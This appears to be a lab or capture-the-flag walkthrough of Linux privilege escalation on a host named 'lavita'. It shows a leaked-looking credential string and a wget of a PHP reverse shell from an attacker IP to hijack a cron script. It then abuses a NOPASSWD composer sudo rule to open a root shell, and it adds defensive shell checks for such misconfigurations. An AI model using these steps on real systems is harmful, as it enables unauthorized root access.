Priv Esc
Last updated
$ ss -anp
...
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp ESTAB 0 2 192.168.111.38:52228 192.168.45.168:1337 users:(("nc",pid=4310,fd=3))
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp ESTAB 0 0 [::ffff:192.168.111.38]:80 [::ffff:192.168.251.111]:42176
v_str ESTAB 0 0 3293820751:1023 0:976
lavita:sdfquelw0kly9jgbx92sdfquelw0kly9jgbx9
Skunk runs a cron job that executes /var/www/html/lavita/artisan. The script is owned by www-data, and www-data can replace it (the rm and mv below succeed), so whatever is dropped in its place runs as skunk on the next tick:
www-data@debian:/dev/shm$ ls -la /var/www/html/lavita/artisan
-rwxr-xr-x 1 www-data www-data 1686 Nov 10 2020 /var/www/html/lavita/artisan
www-data@debian:/var/www/html/lavita$ wget 192.168.45.239/php-reverse-shell.php
--2024-09-16 20:09:10-- http://192.168.45.239/php-reverse-shell.php
Connecting to 192.168.45.239:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5496 (5.4K) [application/octet-stream]
Saving to: ‘php-reverse-shell.php’
php-reverse-shell.p 100%[===================>] 5.37K --.-KB/s in 0.001s
2024-09-16 20:09:10 (7.06 MB/s) - ‘php-reverse-shell.php’ saved [5496/5496]
www-data@debian:/var/www/html/lavita$ rm artisan
www-data@debian:/var/www/html/lavita$ mv php-reverse-shell.php artisan
$ nc -lnvp 1338
listening on [any] 1338 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.235.38] 51340
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux
20:10:08 up 46 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami && id && cat /home/skunk/local.txt && ip a
skunk
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
29f6f5609176f708b80640e2cf2ac5f3
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:bf:69:4d brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.235.38/24 brd 192.168.235.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:febf:694d/64 scope link
valid_lft forever preferred_lft forever
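The condition exploited above, a cron entry whose command file (or the directory holding it) is writable by a lower-privileged user, is worth checking for systematically. The following POSIX shell check is an added example and not part of the original write-up; the crontab lines it feeds itself are constructed (the first mirrors skunk's artisan job with a temporary directory standing in for /var/www/html/lavita, the others are hypothetical).

```shell
# Added example, not part of the original write-up. Reports cron command
# paths that the current user could hijack, either by editing the file
# (FILE) or by replacing it because its directory is writable (DIR), which
# is what the rm + mv of artisan relied on.
report_if_writable() {
    # $1: absolute path taken from a cron line
    if [ -d "$1" ]; then
        return 0                                  # directories are not executed
    elif [ -w "$1" ]; then
        printf 'FILE %s\n' "$1"
    elif [ -w "$(dirname "$1")" ]; then
        printf 'DIR %s\n' "$1"
    fi
}

# Reads crontab-style lines on stdin. Works for both user crontabs
# (schedule + command) and system crontabs (schedule + user + command)
# because it never parses the schedule: it just takes every absolute path.
# Usage: crontab -l | writable_cron_targets
#        cat /etc/crontab /etc/cron.d/* | writable_cron_targets
writable_cron_targets() {
    ( set -f                                      # keep the '*' schedule fields literal
      grep -Ev '^[[:space:]]*(#|$)' | while IFS= read -r line; do
          for tok in $line; do
              case "$tok" in
                  /dev/*) ;;                      # /dev/null redirection targets
                  /*) report_if_writable "${tok%%[>;|&]*}" ;;
                  *) ;;
              esac
          done
      done )
}

# Self-contained demo: a temporary directory stands in for /var/www/html/lavita
# and the crontab lines are constructed (the first mirrors skunk's job, the
# rest are hypothetical and point at paths that do not exist).
demo_writable_cron_targets() {
    tmp=$(mktemp -d)
    printf '#!/bin/sh\n' > "$tmp/artisan"
    chmod 755 "$tmp/artisan"
    printf '%s\n' \
        '# m h dom mon dow command' \
        "* * * * * $tmp/artisan" \
        '*/5 * * * * root /usr/bin/no-such-tool' \
        '0 3 * * * /opt/no-such-dir/backup.sh >/dev/null 2>&1' \
        | writable_cron_targets
    rm -rf "$tmp"
}

demo_writable_cron_targets
```

The DIR verdict matters as much as FILE: a read-only script in a directory you own is still hijackable, exactly as artisan was removed and replaced rather than edited.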
skunk@debian:~$ sudo -l
Matching Defaults entries for skunk on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User skunk may run the following commands on debian:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
skunk@debian:~$ id
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
The (ALL : ALL) ALL entry still asks for skunk's password; the composer entry does not, and its trailing * lets any further arguments through, including the run-script subcommand. Composer executes whatever the scripts entry of composer.json in the working directory names, and that directory belongs to www-data, so go back to the www-data shell and plant the file there:
www-data@debian:/var/www/html/lavita$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > composer.json
Back in the skunk shell, run the planted script through the sudo rule (the \= mirrors the escaped = shown by sudo -l; the shell strips the backslash, so a plain --working-dir= matches the rule as well):
skunk@debian:/var/www/html/lavita$ sudo /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x
Do not run Composer as root/super user! See https://getcomposer.org/root for details
Continue as root/super user [yes]? yes
> /bin/sh -i 0<&3 1>&3 2>&3
# whoami && cat /root/proof.txt && ip addr
root
c380027d15f40bf8d3325d392ce50dc4
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:bf:69:4d brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.235.38/24 brd 192.168.235.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:febf:694d/64 scope link
valid_lft forever preferred_lft forever
#
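The composer rule was abusable for two reasons that a quick pass over sudo -l output can spot: the NOPASSWD command ends in a wildcard, and one of its fixed arguments is a path the caller can write to. The following check is an added example and not part of the original write-up; the sudo -l lines it feeds itself are constructed (the composer rule mirrors the one above with a temporary directory standing in for /var/www/html/lavita, the other rule is hypothetical).

```shell
# Added example, not part of the original write-up. Scans `sudo -l` output
# for NOPASSWD rules with the two properties the composer rule had: a
# trailing '*' (sudo then accepts any further arguments, e.g. a run-script
# subcommand) and a path argument the current user can write to (here the
# working directory whose composer.json decides what composer executes).
# A writable command binary is reported the same way.
# Usage: sudo -l 2>/dev/null | risky_sudo_rules
risky_sudo_rules() {
    ( set -f                                      # keep '*' literal during word splitting
      grep 'NOPASSWD' | while IFS= read -r rule; do
          reasons=''
          case "$rule" in
              *'*'*) reasons='wildcard ' ;;
          esac
          for tok in $rule; do
              p=${tok#*=}                         # --working-dir\=/path -> /path
              case "$p" in
                  /*) if [ -w "$p" ]; then reasons="${reasons}writable:$p "; fi ;;
              esac
          done
          if [ -n "$reasons" ]; then
              printf '%s\t%s\n' "$reasons" "$rule"
          fi
      done )
}

# Self-contained demo with constructed `sudo -l` lines: the composer rule
# mirrors the write-up with a temporary directory in place of
# /var/www/html/lavita; the other rules are hypothetical.
demo_risky_sudo_rules() {
    tmp=$(mktemp -d)
    printf '%s\n' \
        'User skunk may run the following commands on debian:' \
        '    (ALL : ALL) ALL' \
        "    (root) NOPASSWD: /usr/bin/composer --working-dir\\=$tmp *" \
        '    (root) NOPASSWD: /usr/bin/no-such-tool status' \
        | risky_sudo_rules
    rm -rf "$tmp"
}

demo_risky_sudo_rules
```

The fix on the defender's side follows from the same two properties: drop the wildcard so only the intended subcommand is allowed, and never point a NOPASSWD rule at a working directory that a less privileged account (here www-data) can write to.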